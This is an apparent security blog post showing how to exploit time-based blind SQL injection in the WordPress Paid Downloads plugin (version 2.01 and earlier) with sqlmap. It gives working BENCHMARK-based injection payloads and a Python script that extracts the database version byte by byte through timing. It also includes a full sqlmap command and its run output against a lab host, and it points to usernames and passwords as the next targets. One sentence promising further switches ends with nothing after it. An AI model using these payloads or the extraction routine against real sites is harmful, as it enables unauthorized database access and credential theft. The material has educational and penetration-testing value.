For all of you who have wondered how to exploit time-based SQL injection vulnerabilities, here is a short demonstration using sqlmap. It is also dedicated to everyone who thinks that time-based injection is of no significant practical value.
If you've followed the vulnerabilities posted lately on this blog, you've probably seen some of the PoCs (proofs of concept) containing payloads like
"-1 AND 1=IF(2>1, BENCHMARK(5000000, MD5(CHAR(115,113,108,109,97,112))),0)--%20". Such a payload produces no visible output at all: the only signal is the delay in the response when the condition holds, because BENCHMARK() makes the server hash the string five million times. Those cases are the perfect candidates for some good old time-based exploitation.
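To show how a tool turns that single yes/no delay into data, here is an added example (not code from the original post or from sqlmap) that extracts @@version one byte at a time with a binary search over the IF/BENCHMARK pattern above. The target is a constructed stand-in for the vulnerable script: it evaluates the injected condition against a hidden banner and sleeps when it is true, which is all an attacker can observe on a real MySQL box. The class and function names, the 20 ms "BENCHMARK" cost and the calibration rule (baseline plus half the expected delay) are assumptions made for this demonstration.

```python
import re
import statistics
import time


class MockTarget:
    """Constructed stand-in for the vulnerable download.php endpoint.

    The injected condition is evaluated against a hidden banner and, when it
    is true, the request takes `delay` seconds longer, which is exactly the
    observable effect of IF(cond, BENCHMARK(5000000, MD5(...)), 0) on MySQL.
    """

    COND = re.compile(r"ORD\(MID\(\(SELECT @@version\),(\d+),1\)\)>(\d+)")

    def __init__(self, banner="5.1.41-3ubuntu12.8", delay=0.02):
        self.banner = banner
        self.delay = delay      # assumed seconds that BENCHMARK() burns on this box
        self.requests = 0

    def get(self, download_key):
        """Issue one request and return its round-trip time in seconds."""
        self.requests += 1
        start = time.monotonic()
        m = self.COND.search(download_key)
        if m:
            pos, n = int(m.group(1)), int(m.group(2))
            # MySQL semantics: MID() past the end returns '' and ORD('') is 0
            ch = ord(self.banner[pos - 1]) if pos <= len(self.banner) else 0
            if ch > n:
                time.sleep(self.delay)
        return time.monotonic() - start


def payload(pos, n):
    """One boolean question wrapped in the IF/BENCHMARK pattern from the PoCs."""
    return ("1 AND 1=IF(ORD(MID((SELECT @@version),%d,1))>%d,"
            "BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)-- " % (pos, n))


def calibrate(target, samples=5):
    """Measure the no-delay baseline (sqlmap's 'statistical model' step)."""
    times = [target.get(payload(1, 255)) for _ in range(samples)]  # always false
    return statistics.mean(times), statistics.pstdev(times)


def oracle(target, pos, n, threshold):
    """True iff ORD(banner[pos]) > n.

    A positive is only accepted after a second delayed response, so a single
    laggy round trip (the 'considerable lagging' sqlmap warns about) is not
    misread as data. Extra cost: one request per true answer.
    """
    if target.get(payload(pos, n)) < threshold:
        return False
    return target.get(payload(pos, n)) >= threshold


def extract_banner(target, max_len=64):
    """Recover @@version byte by byte; 8 comparisons per byte plus confirmations."""
    mean, stdev = calibrate(target)
    # Assumed rule: slower than baseline noise plus half the expected delay counts as delayed
    threshold = mean + 3 * stdev + target.delay / 2
    out = []
    for pos in range(1, max_len + 1):
        lo, hi = 0, 255
        while lo < hi:                    # binary search over the byte value
            mid = (lo + hi) // 2
            if oracle(target, pos, mid, threshold):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:                       # ORD('') == 0: we ran past the end
            break
        out.append(chr(lo))
    return "".join(out)


if __name__ == "__main__":
    t = MockTarget()
    print(extract_banner(t), "in", t.requests, "requests")
```

Even against this instant, jitter-free stand-in an 18-byte banner costs well over two hundred requests, each of which must wait out the full BENCHMARK() delay whenever the answer is "yes"; over a real network with a noisy baseline the delay has to be raised (sqlmap's --time-sec) and the threshold recalibrated, which is why the banner in the run below takes minutes rather than seconds.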
We'll take "WordPress Paid Downloads plugin <= 2.01 SQL Injection Vulnerability" as the candidate for this little demonstration:
$ python sqlmap.py -u "http://172.16.180.133/wp-content/plugins/paid-downloads/download.php?download_key=1" --dbms=mysql --level=3 --risk=3 --technique=T --banner

    sqlmap/1.0-dev (r4374) - automatic SQL injection and database takeover tool
    http://www.sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 18:54:25

[18:54:25] [INFO] using '/home/stamparm/Work/sqlmap/output/172.16.180.133/session' as session file
[18:54:25] [INFO] testing connection to the target url
[18:54:27] [INFO] heuristics detected web page charset 'ascii'
[18:54:27] [INFO] testing if the url is stable, wait a few seconds
[18:54:29] [INFO] url is stable
[18:54:29] [INFO] testing if GET parameter 'download_key' is dynamic
[18:54:31] [WARNING] GET parameter 'download_key' appears to be not dynamic
[18:54:33] [WARNING] heuristic test shows that GET parameter 'download_key' might not be injectable
[18:54:33] [INFO] testing sql injection on GET parameter 'download_key'
[18:54:33] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[18:54:33] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..
[18:54:34] [CRITICAL] the target url responded with an unknown HTTP status code, try to force the HTTP User-Agent header with option --user-agent or --random-agent, sqlmap is going to retry the request
[18:54:38] [CRITICAL] there is considerable lagging (standard deviation: 0.9 sec) in connection response(s). Please use as high value for --time-sec option as possible (e.g. 10 or more)
[18:54:43] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query)'
[18:55:05] [INFO] GET parameter 'download_key' is 'MySQL < 5.0.12 AND time-based blind (heavy query)' injectable
[18:55:05] [INFO] checking if the injection point on GET parameter 'download_key' is a false positive
GET parameter 'download_key' is vulnerable. Do you want to keep testing the others? [y/N] N
sqlmap identified the following injection points with a total of 40 HTTP(s) requests:
---
Place: GET
Parameter: download_key
    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: download_key=1' AND 6424=BENCHMARK(5000000,MD5(CHAR(102,100,78,99))) AND 'uzOQ'='uzOQ
---
[18:55:36] [INFO] testing MySQL
[18:55:36] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based queries
[18:55:46] [INFO] confirming MySQL
[18:56:05] [INFO] the back-end DBMS is MySQL
[18:56:05] [INFO] fetching banner
[18:56:05] [INFO] retrieved: 5.1.41-3ubuntu12.8
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS operating system: Linux Ubuntu
back-end DBMS: MySQL >= 5.0.0
banner: '5.1.41-3ubuntu12.8'

[19:07:44] [INFO] Fetched data logged to text files under '/home/stamparm/Work/sqlmap/output/172.16.180.133'

[*] shutting down at 19:07:44
P.S. Notice that retrieving the banner alone took more than ten minutes (from 18:56:05 to 19:07:44). In cases like this an attacker will not dump everything; they will go straight for the most sensitive data, such as usernames and passwords. In the same way you can retrieve other data by using switches like:
And for the curious, the CHAR() sequence from the PoC payload above decodes to:

$ python -c "print ''.join([chr(x) for x in [115,113,108,109,97,112]])"
sqlmap

:)